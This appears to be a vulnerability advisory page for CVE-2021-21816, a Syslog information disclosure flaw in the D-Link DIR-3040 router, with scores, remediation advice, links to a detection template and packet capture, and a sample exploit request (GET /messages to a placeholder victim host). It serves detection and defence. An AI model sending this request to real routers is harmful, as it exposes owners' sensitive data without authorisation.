🔙 목록으로 돌아가기

CVE-2021-21816: D-Link DIR-3040 1.13B03 - Information Disclosure

TitleD-Link DIR-3040 1.13B03 - Information Disclosure
Authorgy741
SeverityMedium
ImpactAn attacker can exploit this vulnerability to gain sensitive information from the router, potentially leading to further attacks.
RemediationUpgrade the router firmware to the latest version provided by D-Link.
CVSS Score4.3
EPSS Score0.77268
CVE IDCVE-2021-21816
CWE IDCWE-200
Tags cve2021 cve dlink exposure router syslog vuln

🔍 Vulnerability Description

D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /messages HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 MarketGoo/2.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21816.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-21816.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A